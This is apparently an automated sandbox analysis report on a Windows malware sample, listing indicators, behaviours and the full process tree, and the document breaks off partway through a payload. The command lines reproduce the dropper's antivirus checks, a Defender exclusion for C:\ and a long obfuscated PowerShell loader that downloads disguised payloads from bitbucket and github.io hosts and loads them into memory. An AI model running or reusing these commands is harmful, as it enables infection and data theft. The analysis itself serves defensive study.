\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a78102cae3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1abbe437ef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Occupation.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language micE72.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68174908c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a78102cae3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language D85OAYSPRW6ZOQBEAL9BAA9T7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 24fba0a6a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 71c36a0ccc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 javaw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision javaw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 956 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 6264 taskkill.exe 5004 taskkill.exe 1468 taskkill.exe 7916 taskkill.exe 7608 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2136 schtasks.exe 3524 schtasks.exe 4532 schtasks.exe 5708 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1720 rapes.exe 1720 rapes.exe 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4444 powershell.exe 4444 powershell.exe 4444 powershell.exe 4308 powershell.exe 4308 powershell.exe 4308 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 4600 Msbuild.exe 4600 Msbuild.exe 4600 Msbuild.exe 4600 Msbuild.exe 2420 rapes.exe 2420 rapes.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 4844 tasklist.exe Token: SeDebugPrivilege 4444 tasklist.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 3848 RegAsm.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 5536 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeDebugPrivilege 5572 aspnet_compiler.exe Token: SeDebugPrivilege 6264 taskkill.exe Token: SeDebugPrivilege 5004 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 7916 taskkill.exe Token: SeDebugPrivilege 7608 taskkill.exe Token: SeDebugPrivilege 6412 firefox.exe Token: SeDebugPrivilege 6412 firefox.exe Token: SeDebugPrivilege 3544 1abbe437ef.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 2436 1ecf164df8.exe 2436 1ecf164df8.exe 2436 1ecf164df8.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 4592 Occupation.com 4592 Occupation.com 4592 Occupation.com 2436 1ecf164df8.exe 2436 1ecf164df8.exe 2436 1ecf164df8.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 6412 firefox.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe 7404 24fba0a6a6.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6412 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1968 wrote to memory of 1720 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 87 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 1720 wrote to memory of 3928 1720 rapes.exe 93 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 3928 wrote to memory of 4536 3928 ReK7Ewx.exe 94 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 1836 4536 cmd.exe 96 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 4844 4536 cmd.exe 99 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 5096 4536 cmd.exe 100 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4444 4536 cmd.exe 101 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 4440 4536 cmd.exe 102 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 3660 4536 cmd.exe 103 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 2056 4536 cmd.exe 104 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 3956 4536 cmd.exe 105 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 988 4536 cmd.exe 106 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4200 4536 cmd.exe 107 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 4592 4536 cmd.exe 108 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4536 wrote to memory of 1556 4536 cmd.exe 109 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 4912 4592 Occupation.com 110 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4592 wrote to memory of 2100 4592 Occupation.com 112 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 4912 wrote to memory of 2136 4912 cmd.exe 114 PID 1720 wrote to memory of 1616 1720 rapes.exe 115 PID 1720 wrote to memory of 1616 1720 rapes.exe 115 PID 1720 wrote to memory of 3676 1720 rapes.exe 116 PID 1720 wrote to memory of 3676 1720 rapes.exe 116 PID 3676 wrote to memory of 2420 3676 m4mrV1B.exe 117 PID 3676 wrote to memory of 2420 3676 m4mrV1B.exe 117 PID 2420 wrote to memory of 4452 2420 cmd.exe 119 PID 2420 wrote to memory of 4452 2420 cmd.exe 119 PID 4452 wrote to memory of 4444 4452 WScript.exe 120 PID 4452 wrote to memory of 4444 4452 WScript.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:1836
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:5096
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵
- System Location Discovery: System Language Discovery
PID:3660
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges6⤵
- System Location Discovery: System Language Discovery
PID:3956
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵
- System Location Discovery: System Language Discovery
PID:988
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"8⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5572
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:1556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exeC:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1544
-
-
C:\Windows\SYSTEM32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"5⤵PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@